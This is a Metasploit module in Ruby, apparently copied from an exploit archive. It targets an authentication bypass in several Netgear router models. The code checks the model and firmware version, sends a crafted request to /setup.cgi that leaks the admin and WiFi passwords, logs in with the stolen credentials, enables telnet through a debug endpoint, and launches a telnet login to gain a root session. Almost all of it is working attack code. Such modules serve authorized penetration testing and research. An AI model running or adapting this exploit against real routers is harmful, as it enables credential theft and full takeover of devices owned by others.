Share
## https://sploitus.com/exploit?id=MSF:AUXILIARY/ADMIN/HTTP/NETGEAR_PNPX_GETSHAREFOLDERLIST_AUTH_BYPASS/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/credential_collection'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Netgear PNPX_GetShareFolderList Authentication Bypass',
        'Description' => %q{
          This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers
          running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows
          unauthenticated attackers to reveal the password for the admin user that is used to log into the
          router's administrative portal, in plaintext.

          Once the password has been been obtained, the exploit enables telnet on the target router and then utiltizes
          the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the
          admin user. This will result in the attacker obtaining a new telnet session as the "root" user.

          This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Vulnerability discovery and PoC creation.
          'Grant Willcox' # Metasploit Module
        ],
        'References' => [
          [ 'URL', 'https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133' ],
          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/' ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
        },
        'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
        'DisclosureDate' => '2021-09-06',
        'DefaultTarget' => 0
      )
    )
  end

  def check
    res = send_request_cgi(
      'uri' => '/top.html',
      'method' => 'GET'
    )

    if res.nil?
      return Exploit::CheckCode::Unknown('Connection timed out.')
    end

    unless res.headers['WWW-Authenticate'] =~ /netgear/i
      return Exploit::CheckCode::Safe('Target does not appear to be a Netgear router!')
    end

    # Retrieve model name and firmware version
    res = send_request_cgi({ 'uri' => '/currentsetting.htm' })
    if res.nil?
      return Exploit::CheckCode::Unknown('Connection timed out.')
    end

    data = res.to_s
    firmware_version = data.match(/^Firmware=V(\d+\.\d+\.\d+\.\d+)_(\d+\.\d+\.\d+)/)
    if firmware_version.nil?
      return Exploit::CheckCode::Unknown('Could not retrieve firmware version!')
    end

    major_version = firmware_version[1]
    minor_version = firmware_version[2]

    model_name = data.match(/Model=([a-zA-Z0-9]+)/)
    if model_name.nil?
      return Exploit::CheckCode::Unknown('Could not retrieve model of the router!')
    end

    model_name = model_name[1]

    # Check model is actually vulnerable
    vulnerable_router_models = ['AC2100', 'AC2400', 'AC2600', 'D7000', 'R6220', 'R6230', 'R6260', 'R6330', 'R6350', 'R6700v2', 'R6800', 'R6850', 'R6900v2', 'R7200', 'R7350', 'R7400', 'R7450']
    unless vulnerable_router_models.include?(model_name)
      return Exploit::CheckCode::Safe('Not a vulnerable router model!')
    end

    # Check version is vulnerable
    print_status("Target is a #{model_name} router running firmware version #{major_version}_#{minor_version}")
    if (Rex::Version.new(major_version) >= Rex::Version.new('1.2.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.2.0.88'))
      return Exploit::CheckCode::Appears
    elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.0.1.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.0.1.80'))
      return Exploit::CheckCode::Appears
    elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.1.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.1.0.110')) # Need more work on this as this isn't a good check for affected versions and may overlap with patched versions.
      return Exploit::CheckCode::Appears
    elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.1.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.1.0.84')) # Need more work on this to make sure we apply this to the correct systems.
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe('Not a vulnerable router version!')
    end
  end

  def run
    print_status('Attempting to leak the password of the admin user...')
    res = send_request_cgi(
      'uri' => '/setup.cgi',
      'method' => 'GET',
      'vars_get' => {
        'next_file' => 'BRS_swisscom_success.html',
        'x' => 'todo=PNPX_GetShareFolderList'
      }
    )

    html_response = res.get_html_document
    leaked_info_array = []
    html_response.xpath('//div[@id="passpharse"]/following-sibling::div[@class="right_div"]').map { |node| leaked_info_array << node.text }
    unless leaked_info_array.include?('admin')
      fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin username in its response!')
    end
    wifi_password = leaked_info_array[0]
    wifi_password_5g = leaked_info_array[1]
    username = leaked_info_array[2]
    password = leaked_info_array[3]

    network_names = html_response.xpath('//div[@id="network_name"]/following-sibling::div[@class="right_div"]')
    if network_names.length < 2
      print_warning('Application did not respond with an SSID in its response!')
    else
      wifi_ssid = network_names[1].text
    end

    network_names_5g = html_response.xpath('//div[@id="network_name_5G"]/following-sibling::div/child::text()')
    if network_names_5g.empty?
      print_warning('Application did not respond with an 5G SSID in its response!')
    else
      wifi_ssid_5g = network_names_5g.text
    end

    if wifi_ssid_5g.empty? || wifi_password_5g.empty?
      print_warning('5G SSID information contained blank strings, skipping saving this info to the database!')
    else
      # Create 5G WiFi credential
      wifi_data_5g = {
        origin_type: :import,
        address: datastore['RHOST'],
        module_fullname: fullname,
        workspace_id: myworkspace_id,
        filename: "wifi_#{wifi_ssid_5g}_creds.txt",
        username: wifi_ssid_5g,
        private_data: wifi_password_5g,
        private_type: :password
      }
      create_credential(wifi_data_5g)
    end

    if wifi_ssid.empty? || wifi_password.empty?
      print_warning('SSID information contained blank strings, skipping saving this info to the database!')
    else
      # Create regular WiFi credential
      wifi_data = {
        origin_type: :import,
        address: datastore['RHOST'],
        module_fullname: fullname,
        workspace_id: myworkspace_id,
        filename: "wifi_#{wifi_ssid}_creds.txt",
        username: wifi_ssid,
        private_data: wifi_password,
        private_type: :password
      }
      create_credential(wifi_data)
    end

    if username.empty? || password.empty?
      fail_with(Failure::UnexpectedReply, 'Application responded with expected content, but the matched content was an empty string for some reason!')
    end

    print_good("Can log into target router using username #{username} and password #{password}")

    print_status('Attempting to retrieve /top.html to verify we are logged in!')

    print_status('Sending one request to grab authorization cookie from headers...')
    cookie_jar.clear
    res = send_request_cgi(
      'uri' => '/top.html',
      'method' => 'GET',
      'keep_cookies' => 'true'
    )

    if res.nil?
      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
    end

    if cookie_jar.empty?
      fail_with(Failure::UnexpectedReply, "Router didn't respond with the expected Set-Cookie header to a response to /top.html!")
    end

    print_status('Got the authentication cookie, associating it with a logged in session...')
    res = send_request_cgi(
      'uri' => '/top.html',
      'method' => 'GET',
      'authorization' => basic_auth(username, password)
    )

    if res.nil?
      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
    end

    result = res.get_html_document
    if result.xpath("//div[@id='firm_version']/text()").empty? # Find all div tags with an "id" attribute named "firm_version" and find its text value.
      fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?')
    end

    print_good('Successfully logged into target router using the stolen credentials!')
    print_status('Attempting to store the stolen admin credentials for future use...')

    # Create HTTP Login Data
    store_valid_credential(user: username, private: password, private_type: :password)

    print_status('Enabling telnet on the target router...')
    res = send_request_cgi(
      'uri' => '/setup.cgi',
      'method' => 'GET',
      'vars_get' => {
        'todo' => 'debug'
      },
      'authorization' => basic_auth(username, password)
    )

    if res.nil?
      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
    end

    unless res.body.include?('Debug Enable!')
      fail_with(Failure::UnexpectedReply, 'Target did not enable debug mode for some reason!')
    end
    print_good('Telnet enabled on target router!')
    handler = framework.modules.create('auxiliary/scanner/telnet/telnet_login')
    handler.datastore['RHOSTS'] = datastore['RHOST']
    File.delete('netgear_pnpx_wordlist.txt') if File.exist?('netgear_pnpx_wordlist.txt') # Make sure the file is deleted if it already exists.
    file_handle = File.open('netgear_pnpx_wordlist.txt', 'wb')
    file_handle.write("#{username} #{password}")
    file_handle.close
    handler.datastore['USERPASS_FILE'] = 'netgear_pnpx_wordlist.txt'
    print_status("Attempting to log in with #{username}:#{password}. You should get a new telnet session as the root user")
    handler.run
    File.delete('netgear_pnpx_wordlist.txt') if File.exist?('netgear_pnpx_wordlist.txt') # Remove the file once we are done.
  end
end